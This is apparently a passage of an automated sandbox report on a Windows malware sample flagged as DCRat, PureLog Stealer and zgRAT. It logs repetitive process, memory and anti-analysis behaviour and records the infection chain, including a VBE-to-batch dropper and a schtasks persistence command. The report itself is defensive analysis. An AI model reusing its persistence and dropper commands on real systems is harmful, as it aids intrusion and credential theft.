                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeMemory allocated: 13A0000 memory reserve | memory write watchJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeMemory allocated: 1B020000 memory reserve | memory write watchJump to behavior
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeMemory allocated: B50000 memory reserve | memory write watchJump to behavior
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeMemory allocated: 1A6C0000 memory reserve | memory write watchJump to behavior
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeMemory allocated: FF0000 memory reserve | memory write watch
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeMemory allocated: 1AD20000 memory reserve | memory write watch
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeMemory allocated: 1350000 memory reserve | memory write watch
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeMemory allocated: 1AC50000 memory reserve | memory write watch
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeMemory allocated: D20000 memory reserve | memory write watch
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeMemory allocated: 1A7A0000 memory reserve | memory write watch
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exeMemory allocated: 14C0000 memory reserve | memory write watch
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exeMemory allocated: 1B220000 memory reserve | memory write watch
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeMemory allocated: 1770000 memory reserve | memory write watch
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeMemory allocated: 1E20000 memory reserve | memory write watch
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeMemory allocated: 2370000 memory reserve | memory write watch
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeMemory allocated: 1A3E0000 memory reserve | memory write watch
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeMemory allocated: 800000 memory reserve | memory write watch
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeMemory allocated: 1A3B0000 memory reserve | memory write watch
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeThread delayed: delay time: 922337203685477
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeThread delayed: delay time: 922337203685477
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeThread delayed: delay time: 922337203685477
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\VObntHLa.logJump to dropped file
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\ARUSTYfT.logJump to dropped file
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\hzhmzTUD.logJump to dropped file
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\riACjval.logJump to dropped file
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_0-23436
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe TID: 1136Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe TID: 7288Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe TID: 7296Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe TID: 7384Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe TID: 7400Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe TID: 7616Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe TID: 7832Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe TID: 8060Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe TID: 8144Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeCode function: 0_2_00BDA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00BDA69B
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeCode function: 0_2_00BEC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_00BEC220
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeCode function: 0_2_00BEE6A3 VirtualQuery,GetSystemInfo,0_2_00BEE6A3
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeThread delayed: delay time: 922337203685477
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeThread delayed: delay time: 922337203685477
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeThread delayed: delay time: 922337203685477
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeThread delayed: delay time: 922337203685477
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeFile opened: C:\Users\userJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeFile opened: C:\Users\user\AppDataJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                                    Source: w32tm.exe, 00000022.00000002.1899837079.000001F7926E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllY
                                    Source: 7aHY4r6vXR.exe, 00000000.00000003.1740731841.000000000360B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                    Source: wscript.exe, 00000001.00000003.1793236904.0000000002B0D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d.
                                    Source: wscript.exe, 00000001.00000002.1794697213.0000000002AEB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                                    Source: RuntimeBroker.exe.4.drBinary or memory string: kb9aSsbBD97JTVMcIoeR
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeAPI call chain: ExitProcess graph end nodegraph_0-23666
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information queried: ProcessInformationJump to behavior
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeCode function: 0_2_00BEF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00BEF838
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeCode function: 0_2_00BF7DEE mov eax, dword ptr fs:[00000030h]0_2_00BF7DEE
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeCode function: 0_2_00BFC030 GetProcessHeap,0_2_00BFC030
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess token adjusted: Debug
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess token adjusted: Debug
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess token adjusted: Debug
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess token adjusted: Debug
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeCode function: 0_2_00BEF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00BEF838
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeCode function: 0_2_00BEF9D5 SetUnhandledExceptionFilter,0_2_00BEF9D5
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeCode function: 0_2_00BEFBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00BEFBCA
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeCode function: 0_2_00BF8EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00BF8EBD
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeMemory allocated: page read and write | page guardJump to behavior
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ChainBroker\WiJ0Q2cIafyWfcOMJ8mrmlFuDvVbi9nZIDl7gyLiG4eFyDELulT2kNl2MWww.vbe" Jump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ChainBroker\IrbV6YakyWCvQIuALcoa2IhBwWZ19ItpwUlqov7vyFBfFx5s16nM.bat" "Jump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\ChainBroker\bridgeServerFontSavesMonitor.exe "C:\ChainBroker/bridgeServerFontSavesMonitor.exe"Jump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\axeflxig\axeflxig.cmdline"Jump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "bridgeServerFontSavesMonitorb" /sc MINUTE /mo 9 /tr "'C:\ChainBroker\bridgeServerFontSavesMonitor.exe'" /fJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES69DB.tmp" "c:\Windows\System32\CSCAAFDA77B4B0340CF902F598B7E2DA6.TMP"Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe "C:\Users\Default User\Local Settings\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe"
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeCode function: 0_2_00BEF654 cpuid 0_2_00BEF654
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_00BEAF0F
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeQueries volume information: C:\ChainBroker\bridgeServerFontSavesMonitor.exe VolumeInformationJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeQueries volume information: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeQueries volume information: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe VolumeInformation
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeQueries volume information: C:\ChainBroker\bridgeServerFontSavesMonitor.exe VolumeInformation
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeQueries volume information: C:\ChainBroker\bridgeServerFontSavesMonitor.exe VolumeInformation
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exeQueries volume information: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe VolumeInformation
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeQueries volume information: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe VolumeInformation
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeQueries volume information: C:\ChainBroker\bridgeServerFontSavesMonitor.exe VolumeInformation
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeQueries volume information: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe VolumeInformation
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeCode function: 0_2_00BEDF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_00BEDF1E
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeCode function: 0_2_00BDB146 GetVersionExW,0_2_00BDB146
                                    Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                                    Stealing of Sensitive Information

                                    barindex
                                    Yara detected DCRat
                                    Source: Yara matchFile source: 00000004.00000002.1854260219.000000001321B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: bridgeServerFontSavesMonitor.exe PID: 6996, type: MEMORYSTR
                                    Yara detected PureLog Stealer
                                    Source: Yara matchFile source: 7aHY4r6vXR.exe, type: SAMPLE
                                    Source: Yara matchFile source: 4.0.bridgeServerFontSavesMonitor.exe.ca0000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.7aHY4r6vXR.exe.58ff717.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.7aHY4r6vXR.exe.6f66717.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.7aHY4r6vXR.exe.58ff717.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.7aHY4r6vXR.exe.6f66717.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000000.00000003.1734834073.0000000006F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000004.00000000.1794524656.0000000000CA2000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000003.1735483300.00000000058B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: C:\Windows\SchCache\RuntimeBroker.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe, type: DROPPED
                                    Yara detected zgRAT
                                    Source: Yara matchFile source: 7aHY4r6vXR.exe, type: SAMPLE
                                    Source: Yara matchFile source: 4.0.bridgeServerFontSavesMonitor.exe.ca0000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.7aHY4r6vXR.exe.58ff717.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.7aHY4r6vXR.exe.6f66717.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.7aHY4r6vXR.exe.58ff717.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.7aHY4r6vXR.exe.6f66717.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: C:\Windows\SchCache\RuntimeBroker.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe, type: DROPPED

                                    Remote Access Functionality

                                    barindex
                                    Yara detected DCRat
                                    Source: Yara matchFile source: 00000004.00000002.1854260219.000000001321B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: bridgeServerFontSavesMonitor.exe PID: 6996, type: MEMORYSTR
                                    Yara detected PureLog Stealer
                                    Source: Yara matchFile source: 7aHY4r6vXR.exe, type: SAMPLE
                                    Source: Yara matchFile source: 4.0.bridgeServerFontSavesMonitor.exe.ca0000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.7aHY4r6vXR.exe.58ff717.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.7aHY4r6vXR.exe.6f66717.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.7aHY4r6vXR.exe.58ff717.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.7aHY4r6vXR.exe.6f66717.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000000.00000003.1734834073.0000000006F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000004.00000000.1794524656.0000000000CA2000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000003.1735483300.00000000058B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: C:\Windows\SchCache\RuntimeBroker.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe, type: DROPPED
                                    Yara detected zgRAT
                                    Source: Yara matchFile source: 7aHY4r6vXR.exe, type: SAMPLE
